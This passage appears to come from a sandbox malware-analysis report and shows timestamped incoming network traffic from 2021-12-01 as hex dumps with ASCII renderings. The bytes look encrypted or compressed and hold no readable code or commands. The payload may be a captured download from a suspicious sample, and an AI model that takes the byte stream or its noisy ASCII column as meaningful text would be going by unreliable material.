66 f9 2c a1 a8 6d b9 b2 e7 8e da 01 a1 0e e3 55 de d0 a8 2f e4 bd 39 89 5f 1e e4 4f cf 6b 27 e9 2f d3 fd d9 b1 41 a6 3e 5c 1a 9a 13 da 88 fd 9e 45 Data Ascii: p1Zq4:+LNLg{3Mc8&`C6>#kNX(1:^1lRi[,')cg7PAJj='tzwQbbDDMQ#3@>3R&_W\|f,mU/9_Ok'/A>\E
2021-12-01 18:10:27 UTC	60	IN	Data Raw: 44 59 85 57 fe de c8 44 ea 85 54 1b e0 6d 50 ba be b0 be cc df 72 1b 1a f1 4d 59 ad a8 b1 9d 74 11 a2 e2 27 e9 7d e5 62 e8 57 87 ef 43 74 2a cb 98 89 27 dc e6 ff b1 12 bb 3f 7c 0d aa b8 e2 7b 9e 5c 47 8b c2 c3 b3 dc b9 95 3c b1 2c 76 96 1b b5 f6 76 83 11 92 73 0b 20 f0 3e bf ce ac 50 48 c6 95 28 1e ce 5b 3b 56 bd 62 a0 b7 d6 47 c1 4b 91 5e c2 b6 6c 96 8f f1 31 42 af 13 7b 51 76 da 50 81 00 df e2 b6 2c 20 25 12 e5 e5 56 d9 0d 3a 91 3d d8 9a 17 6d 0e 15 40 81 0f f4 34 b6 17 59 2c 7c 8a d1 64 02 11 e6 c8 1e 6a 2f ec a4 54 aa 1e df 29 a8 31 d0 20 75 ac 09 f4 11 d8 2a df 86 84 7a 52 ba 02 5b 7d a5 d1 d8 28 de fb a3 53 ab d4 09 2d da 17 64 cb d1 c0 66 c2 fd 33 47 e6 a0 1b a0 11 b9 dc 82 91 4c 37 6f 5d 0c ae 2e 4e cd 94 dd 42 a9 ab b6 e3 cf f4 2a 95 24 d6 10 d6 Data Ascii: DYWDTmPrMYt'}bWCt'?\|{\G<,vvs >PH([;VbGK^l1B{QvP, %V:=m@4Y,\|dj/T)1 uzR[}(S-df3GL7o].NB*$
2021-12-01 18:10:27 UTC	61	IN	Data Raw: b3 99 32 16 bc eb 7c 84 c7 4a 1e 10 22 27 fe 63 28 ed c5 2d 84 ab 14 ff b9 92 bd ee 97 67 05 fd 51 73 41 f1 de 51 e3 b6 2b 05 18 6f e0 45 c7 e3 7a b7 6f 1e 58 44 42 8e a8 6a fa 12 a1 97 09 5f 6e de fb 5e d9 fe 59 ad 8a d2 81 af 51 4f 3b 49 bd 40 7a ef 66 22 26 33 eb 0a 3a 06 04 2d 37 62 d5 45 8f 06 bb ad 00 48 d6 0e 78 cc f7 3c b0 7b f0 d4 15 33 de 4d 1f af ef eb 34 0e 46 73 56 29 1c fd e8 83 00 f6 64 6e d0 d6 1b 31 a0 62 16 c8 98 3c d4 38 72 6c 64 5b 83 07 e1 f1 03 dc 2d 39 b2 3f cc a7 ce 5e d9 bb a4 31 aa cf 7b e3 68 0a 51 b4 3d e8 30 ff d6 13 72 03 e9 3c ec 96 60 4f 00 58 69 8d 96 83 40 a9 43 8b d8 8e 04 6a 85 bc 8b 96 8a 74 d1 15 82 80 d5 89 73 02 a8 d8 cb ed 99 68 7a 77 c5 f6 e6 e6 50 4e d1 d9 0b ba 5e 19 38 4c ae af f7 5b 50 0f ba cf 3b 56 b9 87 f3 Data Ascii: 2\|J"'c(-gQsAQ+oEzoXDBj_n^YQO;I@zf"&3:-7bEHx<{3M4FsV)dn1b<8rld[-9?^1{hQ=0r<`OXi@CjtshzwPN^8L[P;V
2021-12-01 18:10:27 UTC	63	IN	Data Raw: 4c 1e 60 ff ed cf 39 ba cf cc 7e ca 0c 91 4b d3 87 50 a2 7c 27 2b 58 87 fb da 59 62 a8 0e 5e a5 42 5d fc d3 1b c2 ad 3a f9 d8 ca 6d 87 08 d7 9b 39 7f 46 f2 44 90 6d 7f e9 7b b1 52 23 ac ec a0 3b 3b ce 01 b1 11 68 d6 58 66 81 42 7f fe 59 19 4c f2 e9 84 5f b9 1f 48 34 be 64 4f c6 28 a8 91 91 d5 52 88 32 df 4f c5 ba 87 4b 93 6b 67 16 6f 20 f6 67 e0 f8 f0 78 0f fd 55 ee 13 e2 85 9b 37 68 12 f9 ae 0b 85 3f 6d 0a bf bf f0 e1 a7 ab 5b 9e d2 77 8c d9 a6 85 34 ab 2d 76 9c af 38 f1 69 9e 14 09 64 24 a8 eb 28 25 f7 85 4d 51 e0 3d cd 1f ce cd 02 cd a2 78 bc 38 c2 51 d8 78 a9 c0 d3 b7 65 a2 b7 6d 20 4f a6 f0 5a c0 71 f2 7e 1f 11 de eb 80 22 a0 25 18 f3 87 46 81 3e 22 93 ad 14 3a 08 4d 2e fb 46 a9 21 6a 25 b7 1e 50 14 e0 9b dc 6d 0e 47 09 fb 1b 75 0a e9 30 54 a5 29 ac Data Ascii: L`9~KP\|'+XYb^B]:m9FDm{R#;;hXfBYL_H4dO(R2OKkgo gxU7h?m[w4-v8id$(%MQ=x8Qxem OZq~"%F>":M.F!j%PmGu0T)
2021-12-01 18:10:27 UTC	64	IN	Data Raw: c4 fe 0d d1 4a 3f c0 d9 72 04 b3 e4 01 f8 13 30 90 2d 5a 45 50 18 0f 1a ad 4e d2 f6 0d 71 7c e5 20 38 1d bc b9 dd 64 25 76 52 30 f7 da f4 60 32 05 4a 63 50 ef 77 3f 79 34 a1 76 45 86 b0 a6 25 3e 7d 61 11 e4 25 df ce 38 4a 3c 18 7f 6b 89 a8 11 a2 2c b2 81 a8 83 17 7f 99 31 00 6b 64 d2 e7 4d b4 91 a5 fb aa 9f bd f0 8e 1a b7 ec 55 7c 41 f8 a0 e5 8d 92 23 16 1b 0d 8c 43 a8 cf 6b b1 78 0a 7d 36 0f 8a ae 03 27 39 a3 9d 1b a7 7e c5 6a 49 c9 fb 7b 28 9b f7 af f7 e3 4e 31 50 a7 cd c1 f9 98 29 3a 1e fb 56 3e 0c dc 7b 94 72 c2 99 88 e9 ab aa ef 5b 38 a8 42 3c 54 c7 4f 6c 99 71 c2 20 d2 48 e7 bf e9 2b be 90 a8 89 a0 62 3d d5 d9 ec b2 fd 77 6b b7 92 1a 27 54 6e 5e af a1 2a dc e6 70 19 6c 50 a9 01 f2 ba 2d 51 38 39 b2 3e df 78 df 44 cf 4e ff 35 aa 6b d8 f2 72 08 79 e8 Data Ascii: J?r0-ZEPNq\| 8d%vR0`2JcPw?y4vE%>}a%8J<k,1kdMU\|A#Ckx}6'9~jI{(N1P):V>{r[8B<TOlq H+b=wk'Tn^*plP-Q89>xDN5kry
2021-12-01 18:10:27 UTC	65	IN	Data Raw: bf 6f 17 83 02 1e cc 2a cb d0 4f 7a d7 9c 2d dc b0 f0 62 bc 00 ea f6 4c 2a 65 e7 62 8d 7f 74 12 5b c3 20 97 7f cf ac ed 24 aa de 25 81 32 22 4a 58 08 a0 10 b3 02 aa cc c8 87 17 78 8a a9 a5 a2 a1 8a 7a fc 7d 28 8d 9d 3d c8 b1 26 37 7d b5 67 eb ff e6 73 0d de c8 6c 6c 1c 51 47 f5 08 4d 8e 78 16 a9 49 8b f3 57 43 ff 9c 44 81 a5 44 75 44 c2 1c d5 2f b9 f2 cf 1c e2 9d 1e c5 93 9e f0 5b e4 57 88 52 ed 32 08 5e cf 32 a1 e0 a3 0a 86 dd 20 a7 9e 59 e9 f5 68 a1 a4 6e df 48 a5 c7 e6 e3 99 55 f3 94 40 40 51 68 50 b6 a7 a8 87 9f cf 5a 9c 30 df 49 4f 26 87 54 9c 75 0f 9e 6a 0f 4a 77 f6 6e c9 25 10 ec 49 fe 3d e5 9a 88 32 e6 12 ec a6 94 ac a3 7c 0c 88 00 e6 7d bc 84 1e 8b c4 e1 8a 08 34 b8 14 54 2c 65 92 25 3a fb 60 9a 11 bd 5b 21 b7 f5 2d b6 f0 91 46 3b e2 bf cd 19 dd Data Ascii: oOz-bLebt[ $%2"JXxz}(=&7}gsllQGMxIWCDDuD/[WR2^2 YhnHU@@QhPZ0IO&TujJwn%I=2\|}4T,e%:`[!-F;
2021-12-01 18:10:27 UTC	66	IN	Data Raw: 26 cd 62 c4 72 db 4d b5 20 a5 45 15 e7 68 19 3e ad 3c f2 3a c6 13 13 72 03 f8 78 f3 9f b6 db 16 49 7d 42 a4 d2 51 aa 5b 5d cb 83 2f 23 95 bf a8 b2 9b a4 c0 32 ed 23 d7 89 64 05 b5 c9 7e 20 99 68 7b 64 f6 e1 dd 0e 40 75 5b e4 18 be 45 a8 2f 6e ab 81 45 a5 51 29 8f 92 33 7e 51 ae 19 fc 38 1c 1b db 2d d0 ea 1f 92 8a bc c3 a3 65 5c b3 9c 59 34 31 18 c6 a3 92 b8 18 30 6b f3 2a 88 27 4b a8 9e d9 f9 cc 8d 94 03 90 72 7d c1 84 28 ca 00 3f 9d 7d 29 c0 c3 f6 7c aa ef 39 fb 4b ca b9 5a 82 07 33 70 8d 9e d9 2a ec 97 42 97 a3 5d 93 13 09 49 9b 7c d8 c0 6f 10 a8 e3 e3 ca 7d 77 b6 1f 94 69 77 23 eb 51 62 94 a6 63 1b df 4e 6b b2 93 2e a8 f4 1c a2 d8 32 86 00 ae 59 52 92 99 76 9f 4c a8 e4 ea e8 0e 73 28 b2 82 a4 66 96 58 bd 73 39 95 c3 c5 c1 3f 9b 18 88 82 71 f8 e5 f9 e2 Data Ascii: &brM Eh><:rxI}BQ[]/#2#d~ h{d@u[E/nEQ)3~Q8-e\Y410k'Kr}(?})\|9KZ3pB]I\|o}wiw#QbcNk.2YRvLs(fXs9?q
2021-12-01 18:10:27 UTC	67	IN	Data Raw: 03 86 79 2b a1 e2 32 af ee 0c e5 60 d7 bc cd 15 c6 47 02 c6 b5 ec 1d ac 5d e1 ef 74 be 5c c8 a4 76 af ad fd 25 5b b5 e4 f4 f7 79 7c c9 b3 c4 d0 7a 29 15 fa 32 ce 7e 24 57 86 20 2e 80 26 0c b3 a0 7a d4 17 57 ba 2c dd 2c a1 04 60 0f 6b 50 d2 63 21 c5 9d fb 11 7d f3 6b cd db b3 3b 9f fd bb 3a ae 05 66 bd 3e 07 08 cc a2 07 b5 5c 6d 82 26 35 4a 79 8c c0 df 3e c9 91 0b e6 b3 08 0b 37 e1 5a 4b 99 c6 aa 5d ce 69 24 44 e6 a6 e0 6c 06 96 ce 4d c2 2e 1b 7c 58 1b b3 b3 7f 3b bc 8a 40 7f bc dd da c3 60 f6 1a 06 d7 06 bf c5 59 65 3f fb df 4d 23 b2 b1 26 02 8e 72 f7 b2 da 15 f4 3b 2a e2 3a 37 9c 47 97 75 4f db 1f fc f7 8a 40 32 cb 6a e4 09 c5 32 4c e7 b7 64 72 8d ec 23 63 09 a3 94 c9 40 04 17 a1 fb 9b b1 2c 24 00 3a 37 8c b5 0a eb 28 cf 07 1d be c3 c5 fe 07 63 59 26 d7 Data Ascii: y+2`G]t\v%[y\|z)2~$W .&zW,,`kPc!}k;:f>\m&5Jy>7ZK]i$DlM.\|X;@`Ye?M#&r;*:7GuO@2j2Ldr#c@,$:7(cY&
2021-12-01 18:10:27 UTC	68	IN	Data Raw: 70 39 23 12 5d bd 44 6b da 14 22 fd 75 45 9e 99 1d 94 06 5b 58 b3 56 12 18 cb 20 48 f7 c3 c9 33 dc 2f 3f bf ff df ac f9 a8 85 9f 53 10 d4 df 89 11 f5 60 0e 89 6d 1b 3b b5 77 b3 db 98 3c df f5 7a 74 c3 79 a9 07 e0 a3 32 d5 3c 33 bb b1 7b 4a ee 5f d9 6c b5 35 bc 7c 70 ea e6 a8 4f 9c 2a f3 30 f5 c6 17 6c 12 ec 78 f2 be 77 c9 01 52 78 5d 86 89 2f 9b 42 8b d2 85 0d 7b 81 c0 93 94 8a 89 c0 1c ed 2f d4 89 68 1f bc dd e5 24 17 df 15 5b d5 f0 f5 0b 56 4a c6 da 18 b4 55 0d 51 5e be a9 e3 a9 59 29 79 dd 16 56 6c 86 f3 f7 2b 1d 1b 21 2e d0 e6 3d 9e b2 bc c9 c6 93 5e b5 b0 48 23 67 d2 d5 b4 83 b6 0f bd 6c f3 2a 89 03 6c b9 b8 f8 e9 db 01 be 03 90 73 c5 d0 a2 3d f9 9c 39 9d 16 36 e0 4f 59 7c aa ff 5c b2 fd ca b3 5d a7 47 d7 7f 9a 19 cd 2c ee be 37 b5 b2 74 96 07 0f c3 Data Ascii: p9#]Dk"uE[XV H3/?S`m;w<zty2<3{J_l5\|pO0lxwRx]/B{/h$[VJUQ^Y)yVl+!.=^H#glls=96OY\|\]G,7t
2021-12-01 18:10:27 UTC	70	IN	Data Raw: 3d ea 91 43 33 a1 68 4b 8c bc b9 b4 8b db 72 88 32 df 5e 2a 11 80 54 96 7e 68 71 7f 27 e3 7b fe 4c 9c 7b 10 ea 6b 0c 06 e5 9c a1 b6 f7 03 f8 c2 e4 92 a3 76 62 5d aa e6 77 be 84 3b 8f c4 ed b5 5e bd 93 12 7c ba 75 9c 35 5a 0a 77 89 08 fa 88 22 b7 f9 36 91 9b 86 52 4e e8 3c c9 1f c8 79 84 c9 bd 64 d9 58 d2 56 cd 0c 42 5d c2 ba 72 96 de f5 31 4e 91 6f 7e 40 77 da e9 80 00 df 87 62 03 20 2f 77 0e 1a 57 8c 29 15 06 35 05 3b 3f e9 0a 04 40 81 b6 f5 34 b6 72 8d 03 7c 80 b4 8f 2d 51 9f e2 34 e9 2d ff aa 6d 26 32 88 2d 80 b2 bb 08 71 df f3 e4 19 c3 43 4d a3 86 70 5c 83 8c 4e 79 8b fb 5d 2c d8 92 ad d6 af d2 1e 56 0e 55 60 c1 b8 52 4d c0 f7 3d 68 7f ac 74 b0 38 30 d2 5c c2 17 82 6e 5d 0c ce db 5e c4 b6 e5 bd a8 ad d3 dd c5 9b d2 85 2d cd 00 63 c7 45 67 3e d2 f6 d8 Data Ascii: =C3hKr2^*T~hq'{L{kvb]w;^\|u5Zw"6RN<ydXVB]r1No~@wb /wW)5;?@4r\|-Q4-m&2-qCMp\Ny],VU`RM=ht80\n]^-cEg>
2021-12-01 18:10:27 UTC	71	IN	Data Raw: 97 b9 97 0f 05 a6 87 3f dc 89 3e 0e 4f ac be c2 ea a0 8e a6 f2 8c 36 73 01 ae 8a 56 d6 cf 55 8d 82 29 05 1e 7e d8 43 66 c6 7a bb 73 0f 55 6d 18 ba ae 6c b9 3a a3 97 99 59 7f c2 82 5b d0 c6 41 71 9f f7 a9 89 59 50 3c a4 b2 1f cc f1 eb 03 2b 1b d2 19 3e 13 d4 07 2e 73 d3 9b 83 19 54 bd 3d 5d 4e aa 41 0b 06 d0 47 6a e7 cb dc 35 26 5d 35 b5 f7 cd d0 d9 b8 8c 82 23 2f c6 d7 83 11 f4 68 68 5d 6d 37 3b bb 68 22 ef c0 a0 c1 ec 63 62 4e 43 a1 19 1f b1 1b d6 3c 3e a9 20 82 fe d1 57 ca 6e a4 20 a2 75 84 e2 44 14 4f 39 16 f2 30 fe c4 14 6b 10 e1 6e fd 9e 7f d8 ff 59 45 5e 86 85 57 6a 50 8d c7 85 17 62 84 be b3 89 74 82 fd 1d 93 03 cc 95 fe 09 a8 d6 f3 36 91 77 6d 89 d5 dc ec 1e 53 74 d5 55 af af 41 1c 51 48 bd a9 e3 83 4e 3b b4 c0 33 6f 53 91 0d fc 14 15 2b 1c 24 d0 Data Ascii: ?>O6sVU)~CfzsUml:Y[AqYP<+>.sT=]NAGj5&]5#/hh]m7;h"cbNC<> Wn uDO90knYE^WjPbt6wmStUAQHN;3oS+$
2021-12-01 18:10:27 UTC	72	IN	Data Raw: 67 55 cd e2 db 0c f8 d9 eb 1b 47 b6 63 16 a9 70 d3 ff 46 4e 0a 33 2f 85 a3 6f 5a 66 cf c1 a2 8c a8 f9 ce db f5 f9 87 c8 84 4e f4 8d e6 54 8a 48 e4 a5 7a b1 ce 23 af e2 af 0d ed 47 00 b1 8b 6a d7 6f 2a a0 a4 75 ef 5d 94 58 e2 99 01 41 ea 85 36 ab a1 69 5a af b3 b1 be 90 d8 72 1b 23 d9 67 7e ab 80 5e b4 5b 1b 8a 74 1e 15 77 f6 64 f0 78 38 eb 43 72 29 f6 92 98 29 cd ef fe b1 18 82 ab 68 25 38 af e6 7b a0 21 43 8b c4 ea 89 ca ad bb b7 54 2d 7c 88 1b f3 f5 76 8f 14 18 72 23 b7 f2 2a ad f2 aa f1 48 c0 b7 e5 83 ce 51 19 db b9 4a a4 a5 d3 50 d4 6a ae 54 d6 98 e2 ba a1 f7 27 c5 be ed 7a 41 65 e6 6a ab a3 d9 f4 94 16 08 ff 1b f3 1d 41 0b 26 3d 85 30 11 29 03 45 ad 04 46 a3 09 6a 34 b0 0b 62 09 6d 82 cf 5a b4 55 95 ec 0a e7 2e ff ac 44 b6 22 9c 03 0b 37 bf 02 63 84 Data Ascii: gUGcpFN3/oZfNTHz#Gjou]XA6iZr#g~^[twdx8Cr))h%8{!CT-\|vr#HQJPjT'zAejA&=0)EFj4bmZU.D"7c
2021-12-01 18:10:27 UTC	74	IN	Data Raw: a9 51 15 93 30 29 af 17 ac 87 4c f5 56 4f 6c 31 1a ba 49 bf d5 56 ed 67 c3 67 28 02 d8 4a 7c 6b 3a 69 ef 19 72 d2 84 43 24 25 95 4b 09 eb eb 28 18 9b b7 56 b4 24 a1 bf b5 27 60 6f 1f d7 ee e7 10 3a d6 2d 07 71 63 86 56 80 ba 1b 61 99 88 25 1e 10 28 ac 11 6f 68 da ee 15 3a b8 1a e6 b6 bf 7f e3 9f 08 b1 ee 5f 6a 4d e3 95 c9 9d 9c 36 1b 05 e2 fc 4c b7 da 67 e4 f5 1e 5b 61 14 9a 25 47 95 38 a2 84 01 48 71 c5 b4 d0 d8 fe 53 ef 8e f9 be 87 5e d3 20 54 ab 2c a8 73 77 26 32 3b 1d 0a 3a 0c 46 05 28 69 dd e4 00 06 a4 a7 0e 19 c4 a8 49 08 16 8f d3 7b f8 de dc 67 44 4d 17 a0 df 2c bf f0 b9 10 99 32 26 dc ff 6a 00 fc 77 fd b2 62 04 3b b5 61 a2 e1 96 23 d5 c6 f2 6a 4e 52 35 16 ef af 3b fc d9 39 b2 3f 50 73 c0 41 d4 79 cf ad bb 63 65 ed 77 53 cd a5 33 ed 3f df 3c 13 72 Data Ascii: Q0)LVOl1IVgg(J\|k:irC$%K(V$'`o:-qcVa%(oh:_jM6Lg[a%G8HqS^ T,sw&2;:F(iI{gDM,2&jwb;a#jNR5;9?PsAycewS3?<r
2021-12-01 18:10:27 UTC	75	IN	Data Raw: bc 82 d9 ed c4 1b 06 dc cb 66 7c 7d a5 0d eb ec 5f dd ea 7c 76 a4 59 62 12 c3 8a 36 61 6e c6 b2 e7 06 af 31 20 bc 3a 00 59 79 11 8f 53 b7 02 b7 d4 e5 87 e6 73 28 b8 0f b5 77 88 03 57 77 39 99 a7 c3 dc 17 2a 21 4c 88 7b fe dc 4e f9 ba c9 e4 5c db 0b 81 27 fc 19 41 af 6a 0e c2 4f 85 fb 4c 65 69 9c 8c 81 a5 44 75 78 c0 1c d5 8a 82 f0 f0 69 f5 96 09 a6 9d 4a e3 5d e6 57 8f 5e d7 d1 e7 b0 ce 32 ba ff bb 10 18 dd 05 a0 89 16 cb 45 6d ab b7 71 e8 4a 88 65 86 f7 88 40 fb 8d 48 3e 3b 7a 56 ad b2 d6 1a 8f db 78 35 96 db 4f 5f 83 3e 54 9c 7e 08 8f 6f 22 c1 46 f6 64 eb 46 57 ed 43 72 71 32 9b 89 2b e7 04 ef b6 0c bb df 7e 0d a6 bc 6b 7a b6 ac 45 98 cb fa 92 c8 a8 96 b6 45 22 65 8c 22 39 e2 62 9e 8f ba 75 23 b6 e0 2f a8 f7 94 45 d4 d1 ac da 37 69 51 13 c0 9b 73 bb b2 Data Ascii: f\|}_\|vYb6an1 :YySs(wWw9*!L{N\'AjOLeiDuxiJ]W^2EmqJe@H>;zVx5O_>T~o"FdFWCrq2+~kzEE"e"9bu#/E7iQs
2021-12-01 18:10:27 UTC	76	IN	Data Raw: 18 b6 a0 29 86 54 ec f1 a3 dc 04 e0 b5 02 1a 21 37 96 6e 58 44 4b d1 14 d8 f7 8a 6a 38 da 75 db 48 d6 3c 57 eb b2 60 6b b7 33 2c 4c 4e 86 95 c9 40 1d c6 85 eb ac b1 26 f0 28 04 1d 8c fe c8 eb 2e e5 07 1c ae c5 c5 fe 07 73 5b 33 c2 a7 42 1e b3 ee 28 b1 15 18 8a 40 ea 4e 7a 01 9d 08 b4 f3 ae ca 0d d2 76 cd 69 2a 10 82 41 6f 65 25 7c f9 39 10 c2 a6 58 26 09 59 46 09 e2 6b c7 17 a8 b8 a6 ec 24 a1 be 01 22 6e 70 0d 98 28 e5 10 30 4e 53 17 6c 7a 93 3e 01 a6 15 77 9c b2 7d 1f 3c 26 e0 1f 61 77 c3 d9 4a a6 a9 1e f5 b5 84 a1 e3 96 11 d3 fe 7d 7b 53 8f c7 57 8c 98 46 0c 1c 7e e7 49 b2 c8 78 be 76 1d ab 6d 27 82 90 56 97 38 a3 88 1c 54 7f da 8a b6 d9 d2 46 74 b7 c1 ac 98 57 59 19 74 b3 33 ca f9 26 bd 2b 1b d3 15 33 01 da 1d 39 78 3c 92 b0 19 7a a6 11 5a 5a 91 53 14 Data Ascii: )T!7nXDKj8uH<W`k3,LN@&(.s[3B(@Nzvi*Aoe%\|9X&YFk$"np(0NSlz>w}<&awJ}{SWF~Ixvm'V8TFtWYt3&+39x<zZZS
2021-12-01 18:10:27 UTC	77	IN	Data Raw: e0 37 b2 a0 bc c9 cc 5e 6e b1 9a 60 23 26 ce d3 b4 83 a7 19 b6 47 e8 2a 8e 23 93 b8 94 cd f0 d0 01 ac 15 6e 72 f3 d2 b5 37 e2 ab 27 63 76 1a e2 64 cb 57 49 ec 54 ba fc ca bd 7a 8c 2a 21 03 f3 13 de 2e c6 96 51 b4 a1 4e 87 02 36 c5 a4 7c de c1 cd 10 9d fc e0 7d 7d 70 ab fe ea c9 4a 3b e0 50 73 aa aa 63 37 d7 63 3c 4d 6b c9 41 e6 23 b1 e4 23 bb db 29 20 38 92 88 7d 9d 20 ae e7 91 ed 17 72 2c 92 af b5 77 8a 40 ef 77 11 93 ac dc c6 3f 91 30 5a 89 5a e3 f4 e8 ea 44 ce e0 e0 c3 00 8b 53 fc e5 40 89 65 10 a6 58 80 e3 b8 49 49 b6 05 87 8e a1 5f 1b a9 1c df 89 82 db da c9 8c fd 0f c9 80 62 e3 57 f5 48 a9 4f dc c1 7b b1 ce 97 ab f3 bb 0d 89 e5 1a b1 8a 6e 2f 46 41 a3 bc 74 fe 5e 93 a3 f4 da 8a 57 e1 83 5e 2b 5f 68 7c be 9f bb bd 6d d9 09 71 32 df 4b 73 89 82 57 e1 Data Ascii: 7^n`#&G#nr7'cvdWITz!.QN6\|}}pJ;Psc7c<MkA##) 8} r,w@w?0ZZDS@eXII_bWHO{n/FAt^W^+_h\|mq2KsW
2021-12-01 18:10:27 UTC	79	IN	Data Raw: 0f e5 13 b4 56 b0 a2 82 50 54 ab 19 7a 7a 8d a0 d9 28 d8 94 85 51 ab d0 30 32 f2 54 6a c8 fa a4 64 fe f8 35 46 84 8e 76 b6 1a c3 d4 2f 95 3e 15 6b 32 49 bc 27 59 c6 bf a2 02 ac ad df a4 e5 f6 2c 8e 42 fc 16 b9 d2 55 1b 78 eb d1 df 31 9e 9f 2d 96 52 83 d9 a1 dc 0e 95 fc 03 08 3d 35 f9 2d 42 74 49 d2 1f 98 f2 8a 4c 57 f2 66 f3 d5 b9 69 5c e9 a0 74 2c 67 33 2c 40 22 bc d5 cc 4a 11 77 a1 c1 9b bb 49 ad 01 3c 1b a6 ea 05 db 2a cf 2f 1d be c5 cd fe 07 62 4d 2d fc bc 4e 03 a4 10 28 83 15 28 9d 42 ed 52 ae 13 81 09 a3 5d ac cd 15 8f 77 e1 7a 17 1f 91 35 6f 1e 5e 7c f0 25 c4 e1 88 5f 4f 7e 40 4b 0d c1 77 39 16 97 90 74 4f 0c a1 bf 29 3e 6e 70 16 e1 3e cc 0b 3a 4d 2b f7 6f 56 9b 2a 17 ab 12 68 7d a9 af 1c 07 23 30 07 79 89 c0 dd 5c 8d ab 3f 1a a8 e4 d0 e3 9f 0c 07 Data Ascii: VPTzz(Q02Tjd5Fv/>k2I'Y,BUx1-R=5-BtILWfi\t,g3,@"JwI</bM-N((BR]wz5o^\|%_O~@Kw9tO)>np>:M+oVh}#0y\?
2021-12-01 18:10:27 UTC	80	IN	Data Raw: 13 c9 88 ec 96 60 54 07 47 78 4b f0 1f 46 a3 51 ab 59 94 04 6a 18 a9 a4 86 93 1f d7 0a 96 24 32 89 62 14 27 d8 ec 32 b9 da 7a 77 d4 6c f9 07 47 7d c4 47 1e a1 53 2a 9b 4c bf a9 75 a3 4e 3b 87 78 33 7e 5b 1a f5 e2 21 09 4a 93 2a cf fa 17 58 8a bc c9 50 4b 41 a8 85 07 bf 20 d1 c9 ab 8c 2a 09 a2 71 ec 6b 15 32 72 a7 a7 da 74 dd 1e b4 23 7d 73 df d0 3e 3a fd 8c 20 e6 eb 30 ff 6e d6 68 36 e8 30 f1 dc 46 b9 50 ae b4 24 61 b9 33 3b 2a ec 96 cd b2 ad 5a 9a 49 82 c3 bb 59 c7 87 51 07 94 d1 d4 6b e1 71 a3 27 cb 24 48 23 eb cc 72 a3 7c 42 95 d5 74 37 d1 6a ce 96 c7 f1 b3 cf 21 0c 3e 34 71 72 44 88 79 b7 9e aa fb c7 a7 f0 72 28 b8 33 b3 68 b5 6f ca eb 3f 8c 81 c3 b5 a3 97 3e 62 9e ed fe eb c0 dd 31 cf cc e2 47 0d 94 64 f5 52 dd a3 78 36 bb c4 81 e4 74 68 b9 b4 2e 85 Data Ascii: `TGxKFQYj$2b'2zwlG}GSLuN;x3~[!JXPKA qk2rt#}s>: 0nh60FP$a3;ZIYQkq'$H#r\|Bt7j!>4qrDyr(3ho?>b1GdRx6th.
2021-12-01 18:10:27 UTC	81	IN	Data Raw: de 45 cc 63 ae 57 dd b9 84 bf 8d fb 26 4f aa e7 69 48 6e f8 6d 88 00 c8 ff 89 fc 21 09 1b eb 08 5c 86 30 36 9a 3f fb 3c 3b 7d 1f 03 6e 13 25 f6 32 df 2b 73 02 7a 95 d4 61 27 51 84 e1 04 94 28 d3 a6 47 8a a3 88 2b a2 3b a6 1b 7c ac 1e ee 06 c4 d2 b1 8e af 6b 53 ad 1b 42 e3 a5 6b dd 28 de bc 3c 55 ab d4 0e 0d 9d 55 60 cd ff c9 4d c0 f7 1d 2d f6 a8 72 d9 36 bb d6 5a db 31 06 66 5d 1b b6 31 a1 c5 90 89 57 ba a6 d9 da c6 eb 3e 7a 2c eb 15 92 d1 6f 5e c4 15 2e d0 18 a5 90 2d 96 1d ec f1 a3 77 04 fa be 14 04 10 06 96 67 5b 8a 4e fd 38 da 89 2c 4a 38 de 72 db 4d d7 3c 57 e2 bf 7a 43 2d 25 d2 47 0d 96 8c c5 4a 1f 0e 77 c2 b7 b3 31 f6 00 34 04 72 f5 3a e9 03 cd 2c d0 96 52 c5 fe 0d 74 41 21 59 10 54 de dc fb 28 af 1d 1a 96 42 ea 57 60 17 ad fe b4 56 ac 66 0d 71 67 Data Ascii: EcW&OiHnm!\06?<;}n%2+sza'Q(G+;\|kSBk(<UU`M-r6Z1f]1W>z,o^.-wg[N8,J8rM<WzC-%GJw14r:,RtA!YT(BW`Vfqg
2021-12-01 18:10:27 UTC	82	IN	Data Raw: 50 9b b5 02 95 a7 54 32 54 c0 1c d5 a5 9d fb d8 c0 fb 8f 1c cd 84 59 e7 41 0b 5a b5 4e cb fa 7f b1 df 36 b0 0d ab 37 80 e5 03 9a 06 70 fb 47 76 91 a7 7f 15 5b 85 5d 5a f6 88 51 e8 fd ca 33 a1 63 46 94 9a b9 96 84 cd 5c 3d 31 a1 dc 59 ab 8a 42 b4 5a 1b 8a 74 31 da 75 dd 6b e5 01 83 ec 43 78 14 cd b4 89 21 fe 15 cd ba 30 bd a1 7c 0b aa 76 49 7f b6 ac 47 98 c3 98 21 de b9 99 1f 45 2a 65 8d 25 3a e6 67 98 6d 5c 75 23 bd e0 2c 92 f8 93 43 59 d0 d2 2c 1e ce 5b 00 c1 ba 70 a1 8c e5 54 c7 69 d0 90 c2 b0 70 af b1 e6 e7 5b a9 fc 6a 51 63 c0 a2 f0 bc d9 f4 94 0f 36 22 77 c4 19 57 8c 36 e7 96 22 16 31 2f 82 0e 04 46 ae 30 fa 5b 84 03 71 08 54 37 df 72 2a 47 bd c4 1c 6a 23 e9 9f 4e ab 1e 36 2f a8 31 d0 c4 77 ac 05 e2 08 c5 43 84 a0 86 70 7c 14 0e 4a 7f 9b fb f7 28 d8 Data Ascii: PT2TYAZN67pGv[]ZQ3cF\=1YBZt1ukCx!0\|vIG!Ee%:gm\u#,CY,[pTip[jQc6"wW6"1/F0[qT7rGj#N6/1wCp\|J(
2021-12-01 18:10:27 UTC	83	IN	Data Raw: b6 34 0c 5d 6a ce 7b 22 cb b6 dd 55 11 25 7c f0 26 ec b8 4c 5c 32 01 ce fc 1e 31 46 0a 00 ae bb 7b 4f 2d b6 41 28 1a 6c 68 0a f7 3c ff ee 3b 66 31 0a 6c 01 5f 32 1c af 9b c9 b2 61 9a 13 10 21 29 fe 60 5b c5 e7 74 bc a4 14 f0 b1 61 ad cf 86 0a 56 39 51 75 54 fb 5e 75 0c 92 29 05 41 5e 6d 42 a8 c5 56 ac 6e 25 49 61 0b 83 be 92 94 14 a1 80 02 59 76 cf 6a 49 f4 fc 78 76 a7 89 56 67 ae 48 26 8c b8 34 c8 de ee 2b 35 cd f9 0a 3a 0c c9 24 20 73 72 92 9c 17 19 bc 11 4b 4e aa 4e 2c eb c3 4f 6a f6 d2 ca 3a 26 5d 35 b3 fb d6 65 7c 86 8c 88 3d 2a d1 c4 90 09 fc 66 68 ba 92 1a 1d a1 71 b3 db 98 3c df f5 75 